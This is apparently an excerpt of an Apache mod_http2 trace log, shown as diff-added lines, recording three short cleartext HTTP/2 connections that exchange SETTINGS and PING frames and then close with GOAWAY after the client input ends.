+[Thu Aug 06 15:43:36.411253 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(366): [client 192.168.65.1:54158] h2_c1_io(4): adding 17 data bytes
+[Thu Aug 06 15:43:36.411260 2026] [http2:debug] [pid 921:tid 953] h2_session.c(635): [client 192.168.65.1:54158] AH03068: h2_session(921-1,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:43:36.411269 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(131): [client 192.168.65.1:54158] h2_session(4)-out: heap[17] flush 
+[Thu Aug 06 15:43:36.411296 2026] [http2:debug] [pid 921:tid 953] h2_session.c(848): [client 192.168.65.1:54158] AH03069: h2_session(921-1,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:43:36.411299 2026] [http2:debug] [pid 921:tid 953] h2_session.c(1459): [client 192.168.65.1:54158] AH03078: h2_session(921-1,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:43:36.411301 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:54158] h2_session(921-1,DONE,0): session_read done
+[Thu Aug 06 15:43:36.411303 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(524): [client 192.168.65.1:54158] h2_session(921-1,DONE,0): session_read start
+[Thu Aug 06 15:43:36.411305 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:54158] h2_session(921-1,DONE,0): input gone
+[Thu Aug 06 15:43:36.411307 2026] [http2:trace2] [pid 921:tid 953] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:54158] h2_session(921-1,DONE,0): session_read done
+[Thu Aug 06 15:43:36.411309 2026] [http2:debug] [pid 921:tid 953] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:54158] AH03045: h2_session(921-1,DONE,0): process, closing conn
+[Thu Aug 06 15:43:36.411313 2026] [http2:trace1] [pid 921:tid 953] h2_session.c(2133): [client 192.168.65.1:54158] h2_session(921-1,DONE,0): pre_close
+[Thu Aug 06 15:43:36.411317 2026] [http2:trace1] [pid 921:tid 953] h2_session.c(859): [client 192.168.65.1:54158] h2_session(921-1,DONE,0): pool_cleanup
+[Thu Aug 06 15:43:36.411318 2026] [http2:debug] [pid 921:tid 953] h2_session.c(1459): [client 192.168.65.1:54158] AH03078: h2_session(921-1,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:43:36.411320 2026] [http2:trace2] [pid 921:tid 953] h2_mplx.c(502): [client 192.168.65.1:54158] h2_mplx(921-1): start release
+[Thu Aug 06 15:43:36.411321 2026] [http2:trace1] [pid 921:tid 953] h2_mplx.c(518): [client 192.168.65.1:54158] h2_mplx(921-1): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:43:36.411324 2026] [http2:trace1] [pid 921:tid 953] h2_mplx.c(570): [client 192.168.65.1:54158] h2_mplx(921-1): released
+[Thu Aug 06 15:43:36.411734 2026] [http2:trace1] [pid 921:tid 954] h2_c1.c(246): [client 192.168.65.1:21446] h2_h2, process_conn
+[Thu Aug 06 15:43:36.411757 2026] [http2:trace1] [pid 921:tid 954] h2_c1.c(251): [client 192.168.65.1:21446] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:43:36.411765 2026] [http2:trace1] [pid 921:tid 954] h2_c1.c(281): [client 192.168.65.1:21446] h2_h2, direct mode detected
+[Thu Aug 06 15:43:36.411768 2026] [http2:trace1] [pid 921:tid 954] h2_c1.c(297): [client 192.168.65.1:21446] process_conn
+[Thu Aug 06 15:43:36.411771 2026] [http2:debug] [pid 921:tid 954] h2_stream.c(609): [client 192.168.65.1:21446] AH03082: h2_stream(921-2-0,IDLE): created
+[Thu Aug 06 15:43:36.411824 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1070): [client 192.168.65.1:21446] AH03200: h2_session(921-2,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:43:36.411828 2026] [http2:trace1] [pid 921:tid 954] h2_c1.c(300): [client 192.168.65.1:21446] conn_setup
+[Thu Aug 06 15:43:36.411831 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1170): [client 192.168.65.1:21446] AH03201: h2_session(921-2,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:43:36.411841 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1876): [client 192.168.65.1:21446] AH03079: h2_session(921-2,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:43:36.411843 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1459): [client 192.168.65.1:21446] AH03078: h2_session(921-2,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:43:36.411846 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(366): [client 192.168.65.1:21446] h2_c1_io(5): adding 15 data bytes
+[Thu Aug 06 15:43:36.411849 2026] [http2:debug] [pid 921:tid 954] h2_session.c(635): [client 192.168.65.1:21446] AH03068: h2_session(921-2,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:43:36.411851 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(366): [client 192.168.65.1:21446] h2_c1_io(5): adding 13 data bytes
+[Thu Aug 06 15:43:36.411853 2026] [http2:debug] [pid 921:tid 954] h2_session.c(635): [client 192.168.65.1:21446] AH03068: h2_session(921-2,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:43:36.411854 2026] [http2:trace2] [pid 921:tid 954] h2_session.c(1369): [client 192.168.65.1:21446] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.411860 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(131): [client 192.168.65.1:21446] h2_session(5)-out: heap[28] 
+[Thu Aug 06 15:43:36.411865 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(131): [client 192.168.65.1:21446] h2_session(5)-out: flush 
+[Thu Aug 06 15:43:36.411920 2026] [http2:trace2] [pid 921:tid 954] h2_mplx.c(1206): [client 192.168.65.1:21446] h2_mplx(921-2): enter polling timeout=0
+[Thu Aug 06 15:43:36.411925 2026] [http2:trace2] [pid 921:tid 954] h2_mplx.c(1250): [client 192.168.65.1:21446] h2_mplx(921-2): polling timed out 
+[Thu Aug 06 15:43:36.411926 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.411930 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(506): [client 192.168.65.1:21446] bb_dump(5): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:43:36.411934 2026] [http2:debug] [pid 921:tid 954] h2_session.c(383): [client 192.168.65.1:21446] AH03066: h2_session(921-2,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.411936 2026] [http2:trace2] [pid 921:tid 954] h2_session.c(464): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.411939 2026] [http2:debug] [pid 921:tid 954] h2_session.c(383): [client 192.168.65.1:21446] AH03066: h2_session(921-2,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.411940 2026] [http2:trace2] [pid 921:tid 954] h2_session.c(473): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:43:36.411942 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(556): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.411944 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(366): [client 192.168.65.1:21446] h2_c1_io(5): adding 9 data bytes
+[Thu Aug 06 15:43:36.411945 2026] [http2:debug] [pid 921:tid 954] h2_session.c(635): [client 192.168.65.1:21446] AH03068: h2_session(921-2,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:43:36.411947 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(366): [client 192.168.65.1:21446] h2_c1_io(5): adding 17 data bytes
+[Thu Aug 06 15:43:36.411949 2026] [http2:debug] [pid 921:tid 954] h2_session.c(635): [client 192.168.65.1:21446] AH03068: h2_session(921-2,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:43:36.411950 2026] [http2:trace2] [pid 921:tid 954] h2_session.c(1369): [client 192.168.65.1:21446] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.411952 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(131): [client 192.168.65.1:21446] h2_session(5)-out: heap[26] 
+[Thu Aug 06 15:43:36.411953 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(131): [client 192.168.65.1:21446] h2_session(5)-out: flush 
+[Thu Aug 06 15:43:36.411968 2026] [http2:trace2] [pid 921:tid 954] h2_mplx.c(1206): [client 192.168.65.1:21446] h2_mplx(921-2): enter polling timeout=0
+[Thu Aug 06 15:43:36.411971 2026] [http2:trace2] [pid 921:tid 954] h2_mplx.c(1250): [client 192.168.65.1:21446] h2_mplx(921-2): polling timed out 
+[Thu Aug 06 15:43:36.411972 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.411975 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1459): [client 192.168.65.1:21446] AH03078: h2_session(921-2,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:43:36.411976 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.411981 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.411983 2026] [http2:trace2] [pid 921:tid 954] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.411984 2026] [http2:debug] [pid 921:tid 954] h2_session.c(1971): [client 192.168.65.1:21446] AH10306: h2_session(921-2,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:43:36.412248 2026] [http2:trace1] [pid 921:tid 955] h2_c1.c(246): [client 192.168.65.1:21446] h2_h2, process_conn
+[Thu Aug 06 15:43:36.412257 2026] [http2:trace1] [pid 921:tid 955] h2_c1.c(297): [client 192.168.65.1:21446] process_conn
+[Thu Aug 06 15:43:36.412260 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.412270 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(506): [client 192.168.65.1:21446] bb_dump(6): c1 in(HEAP[9])
+[Thu Aug 06 15:43:36.412275 2026] [http2:debug] [pid 921:tid 955] h2_session.c(383): [client 192.168.65.1:21446] AH03066: h2_session(921-2,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.412277 2026] [http2:trace2] [pid 921:tid 955] h2_session.c(464): [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.412278 2026] [http2:trace2] [pid 921:tid 955] h2_session.c(489): [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:43:36.412283 2026] [http2:debug] [pid 921:tid 955] h2_session.c(1459): [client 192.168.65.1:21446] AH03078: h2_session(921-2,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:43:36.412285 2026] [http2:trace1] [pid 921:tid 955] h2_session.c(1474): [client 192.168.65.1:21446] h2_session(921-2,IDLE,0): enter idle
+[Thu Aug 06 15:43:36.412286 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(556): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.412288 2026] [http2:trace2] [pid 921:tid 955] h2_mplx.c(1206): [client 192.168.65.1:21446] h2_mplx(921-2): enter polling timeout=0
+[Thu Aug 06 15:43:36.412291 2026] [http2:trace2] [pid 921:tid 955] h2_session.c(1406): [client 192.168.65.1:21446] h2_stream(921-2-0,IDLE): on_input change
+[Thu Aug 06 15:43:36.412294 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.412295 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:21446] h2_session(921-2,BUSY,0): input gone
+[Thu Aug 06 15:43:36.412297 2026] [http2:debug] [pid 921:tid 955] h2_session.c(1569): [client 192.168.65.1:21446] AH03401: h2_session(921-2,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:43:36.412300 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(366): [client 192.168.65.1:21446] h2_c1_io(6): adding 17 data bytes
+[Thu Aug 06 15:43:36.412301 2026] [http2:debug] [pid 921:tid 955] h2_session.c(635): [client 192.168.65.1:21446] AH03068: h2_session(921-2,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:43:36.412311 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(131): [client 192.168.65.1:21446] h2_session(6)-out: heap[17] flush 
+[Thu Aug 06 15:43:36.412338 2026] [http2:debug] [pid 921:tid 955] h2_session.c(848): [client 192.168.65.1:21446] AH03069: h2_session(921-2,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:43:36.412341 2026] [http2:debug] [pid 921:tid 955] h2_session.c(1459): [client 192.168.65.1:21446] AH03078: h2_session(921-2,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:43:36.412342 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:21446] h2_session(921-2,DONE,0): session_read done
+[Thu Aug 06 15:43:36.412344 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(524): [client 192.168.65.1:21446] h2_session(921-2,DONE,0): session_read start
+[Thu Aug 06 15:43:36.412345 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:21446] h2_session(921-2,DONE,0): input gone
+[Thu Aug 06 15:43:36.412347 2026] [http2:trace2] [pid 921:tid 955] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:21446] h2_session(921-2,DONE,0): session_read done
+[Thu Aug 06 15:43:36.412349 2026] [http2:debug] [pid 921:tid 955] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:21446] AH03045: h2_session(921-2,DONE,0): process, closing conn
+[Thu Aug 06 15:43:36.412352 2026] [http2:trace1] [pid 921:tid 955] h2_session.c(2133): [client 192.168.65.1:21446] h2_session(921-2,DONE,0): pre_close
+[Thu Aug 06 15:43:36.412356 2026] [http2:trace1] [pid 921:tid 955] h2_session.c(859): [client 192.168.65.1:21446] h2_session(921-2,DONE,0): pool_cleanup
+[Thu Aug 06 15:43:36.412357 2026] [http2:debug] [pid 921:tid 955] h2_session.c(1459): [client 192.168.65.1:21446] AH03078: h2_session(921-2,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:43:36.412359 2026] [http2:trace2] [pid 921:tid 955] h2_mplx.c(502): [client 192.168.65.1:21446] h2_mplx(921-2): start release
+[Thu Aug 06 15:43:36.412360 2026] [http2:trace1] [pid 921:tid 955] h2_mplx.c(518): [client 192.168.65.1:21446] h2_mplx(921-2): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:43:36.412362 2026] [http2:trace1] [pid 921:tid 955] h2_mplx.c(570): [client 192.168.65.1:21446] h2_mplx(921-2): released
+[Thu Aug 06 15:43:36.412724 2026] [http2:trace1] [pid 921:tid 956] h2_c1.c(246): [client 192.168.65.1:57431] h2_h2, process_conn
+[Thu Aug 06 15:43:36.412742 2026] [http2:trace1] [pid 921:tid 956] h2_c1.c(251): [client 192.168.65.1:57431] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:43:36.412748 2026] [http2:trace1] [pid 921:tid 956] h2_c1.c(281): [client 192.168.65.1:57431] h2_h2, direct mode detected
+[Thu Aug 06 15:43:36.412751 2026] [http2:trace1] [pid 921:tid 956] h2_c1.c(297): [client 192.168.65.1:57431] process_conn
+[Thu Aug 06 15:43:36.412753 2026] [http2:debug] [pid 921:tid 956] h2_stream.c(609): [client 192.168.65.1:57431] AH03082: h2_stream(921-3-0,IDLE): created
+[Thu Aug 06 15:43:36.412801 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1070): [client 192.168.65.1:57431] AH03200: h2_session(921-3,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:43:36.412804 2026] [http2:trace1] [pid 921:tid 956] h2_c1.c(300): [client 192.168.65.1:57431] conn_setup
+[Thu Aug 06 15:43:36.412808 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1170): [client 192.168.65.1:57431] AH03201: h2_session(921-3,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:43:36.412811 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1876): [client 192.168.65.1:57431] AH03079: h2_session(921-3,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:43:36.412818 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1459): [client 192.168.65.1:57431] AH03078: h2_session(921-3,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:43:36.412820 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(366): [client 192.168.65.1:57431] h2_c1_io(7): adding 15 data bytes
+[Thu Aug 06 15:43:36.412823 2026] [http2:debug] [pid 921:tid 956] h2_session.c(635): [client 192.168.65.1:57431] AH03068: h2_session(921-3,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:43:36.412825 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(366): [client 192.168.65.1:57431] h2_c1_io(7): adding 13 data bytes
+[Thu Aug 06 15:43:36.412826 2026] [http2:debug] [pid 921:tid 956] h2_session.c(635): [client 192.168.65.1:57431] AH03068: h2_session(921-3,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:43:36.412828 2026] [http2:trace2] [pid 921:tid 956] h2_session.c(1369): [client 192.168.65.1:57431] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.412836 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(131): [client 192.168.65.1:57431] h2_session(7)-out: heap[28] 
+[Thu Aug 06 15:43:36.412841 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(131): [client 192.168.65.1:57431] h2_session(7)-out: flush 
+[Thu Aug 06 15:43:36.412860 2026] [http2:trace2] [pid 921:tid 956] h2_mplx.c(1206): [client 192.168.65.1:57431] h2_mplx(921-3): enter polling timeout=0
+[Thu Aug 06 15:43:36.412863 2026] [http2:trace2] [pid 921:tid 956] h2_mplx.c(1250): [client 192.168.65.1:57431] h2_mplx(921-3): polling timed out 
+[Thu Aug 06 15:43:36.412864 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.412867 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(506): [client 192.168.65.1:57431] bb_dump(7): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:43:36.412871 2026] [http2:debug] [pid 921:tid 956] h2_session.c(383): [client 192.168.65.1:57431] AH03066: h2_session(921-3,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.412872 2026] [http2:trace2] [pid 921:tid 956] h2_session.c(464): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.412874 2026] [http2:debug] [pid 921:tid 956] h2_session.c(383): [client 192.168.65.1:57431] AH03066: h2_session(921-3,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.412876 2026] [http2:trace2] [pid 921:tid 956] h2_session.c(473): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:43:36.412878 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(556): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.412879 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(366): [client 192.168.65.1:57431] h2_c1_io(7): adding 9 data bytes
+[Thu Aug 06 15:43:36.412881 2026] [http2:debug] [pid 921:tid 956] h2_session.c(635): [client 192.168.65.1:57431] AH03068: h2_session(921-3,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:43:36.412882 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(366): [client 192.168.65.1:57431] h2_c1_io(7): adding 17 data bytes
+[Thu Aug 06 15:43:36.412884 2026] [http2:debug] [pid 921:tid 956] h2_session.c(635): [client 192.168.65.1:57431] AH03068: h2_session(921-3,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:43:36.412885 2026] [http2:trace2] [pid 921:tid 956] h2_session.c(1369): [client 192.168.65.1:57431] nghttp2_session_send: 0
+[Thu Aug 06 15:43:36.412887 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(131): [client 192.168.65.1:57431] h2_session(7)-out: heap[26] 
+[Thu Aug 06 15:43:36.412889 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(131): [client 192.168.65.1:57431] h2_session(7)-out: flush 
+[Thu Aug 06 15:43:36.412900 2026] [http2:trace2] [pid 921:tid 956] h2_mplx.c(1206): [client 192.168.65.1:57431] h2_mplx(921-3): enter polling timeout=0
+[Thu Aug 06 15:43:36.412911 2026] [http2:trace2] [pid 921:tid 956] h2_mplx.c(1250): [client 192.168.65.1:57431] h2_mplx(921-3): polling timed out 
+[Thu Aug 06 15:43:36.412913 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.412915 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1459): [client 192.168.65.1:57431] AH03078: h2_session(921-3,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:43:36.412916 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.412920 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.412922 2026] [http2:trace2] [pid 921:tid 956] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): session_read done
+[Thu Aug 06 15:43:36.412923 2026] [http2:debug] [pid 921:tid 956] h2_session.c(1971): [client 192.168.65.1:57431] AH10306: h2_session(921-3,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:43:36.413209 2026] [http2:trace1] [pid 921:tid 957] h2_c1.c(246): [client 192.168.65.1:57431] h2_h2, process_conn
+[Thu Aug 06 15:43:36.413226 2026] [http2:trace1] [pid 921:tid 957] h2_c1.c(297): [client 192.168.65.1:57431] process_conn
+[Thu Aug 06 15:43:36.413230 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): session_read start
+[Thu Aug 06 15:43:36.413242 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(506): [client 192.168.65.1:57431] bb_dump(8): c1 in(HEAP[9])
+[Thu Aug 06 15:43:36.413248 2026] [http2:debug] [pid 921:tid 957] h2_session.c(383): [client 192.168.65.1:57431] AH03066: h2_session(921-3,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:43:36.413249 2026] [http2:trace2] [pid 921:tid 957] h2_session.c(464): [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:43:36.413250 2026] [http2:trace2] [pid 921:tid 957] h2_session.c(489): [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:43:36.413252 2026] [http2:debug] [pid 921:tid 957] h2_session.c(1459): [client 192.168.65.1:57431] AH03078: h2_session(921-3,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:43:36.413253 2026] [http2:trace1] [pid 921:tid 957] h2_session.c(1474): [client 192.168.65.1:57431] h2_session(921-3,IDLE,0): enter idle
+[Thu Aug 06 15:43:36.413254 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(556): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): session_read done
+[Thu Aug 06 15:43:36.413256 2026] [http2:trace2] [pid 921:tid 957] h2_mplx.c(1206): [client 192.168.65.1:57431] h2_mplx(921-3): enter polling timeout=0
+[Thu Aug 06 15:43:36.413259 2026] [http2:trace2] [pid 921:tid 957] h2_session.c(1406): [client 192.168.65.1:57431] h2_stream(921-3-0,IDLE): on_input change
+[Thu Aug 06 15:43:36.413262 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): session_read start
+[Thu Aug 06 15:43:36.413263 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:57431] h2_session(921-3,BUSY,0): input gone
+[Thu Aug 06 15:43:36.413265 2026] [http2:debug] [pid 921:tid 957] h2_session.c(1569): [client 192.168.65.1:57431] AH03401: h2_session(921-3,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:43:36.413268 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(366): [client 192.168.65.1:57431] h2_c1_io(8): adding 17 data bytes
+[Thu Aug 06 15:43:36.413269 2026] [http2:debug] [pid 921:tid 957] h2_session.c(635): [client 192.168.65.1:57431] AH03068: h2_session(921-3,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:43:36.413274 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(131): [client 192.168.65.1:57431] h2_session(8)-out: heap[17] flush 
+[Thu Aug 06 15:43:36.413315 2026] [http2:debug] [pid 921:tid 957] h2_session.c(848): [client 192.168.65.1:57431] AH03069: h2_session(921-3,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:43:36.413319 2026] [http2:debug] [pid 921:tid 957] h2_session.c(1459): [client 192.168.65.1:57431] AH03078: h2_session(921-3,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:43:36.413320 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:57431] h2_session(921-3,DONE,0): session_read done
+[Thu Aug 06 15:43:36.413322 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(524): [client 192.168.65.1:57431] h2_session(921-3,DONE,0): session_read start
+[Thu Aug 06 15:43:36.413323 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:57431] h2_session(921-3,DONE,0): input gone
+[Thu Aug 06 15:43:36.413324 2026] [http2:trace2] [pid 921:tid 957] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:57431] h2_session(921-3,DONE,0): session_read done
+[Thu Aug 06 15:43:36.413326 2026] [http2:debug] [pid 921:tid 957] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:57431] AH03045: h2_session(921-3,DONE,0): process, closing conn
+[Thu Aug 06 15:43:36.413330 2026] [http2:trace1] [pid 921:tid 957] h2_session.c(2133): [client 192.168.65.1:57431] h2_session(921-3,DONE,0): pre_close
